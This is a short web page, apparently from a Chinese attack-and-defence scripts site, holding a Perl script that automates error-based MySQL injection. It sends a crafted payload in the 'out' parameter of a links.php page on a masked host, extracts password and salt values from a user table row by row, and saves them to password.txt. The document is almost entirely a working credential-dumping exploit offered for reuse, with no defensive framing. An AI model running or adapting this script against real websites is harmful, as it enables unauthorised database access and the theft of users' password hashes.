mysql注入导库脚本代码_脚本攻防_网络安全_

#!/usr/bin/perl -w
#www.sh3llc0de.com
#转载须注明
#语法 自己改改
use strict;
use LWP::Simple;
use utf8;
$|++;
my $count = 1;
for ($count = 1; $count <= 600_000; $count++) {
print 'ID: ', $count, "\n";
my $url = 'http://www.***.com/links.php?out=2 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x5e24,0x7c,password,0x3A,salt,0x245e) FROM `wowguru_db`.user LIMIT%20' . $count . ',1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1';
#print "$url\n";
my $content = get($url);
while ($content =~ m|\^\$(.+?)\$\^|igs) {
open FILE, ">>", "password.txt" or die $!;
print "$1\n";
print FILE "$1\n";
close FILE;
}
}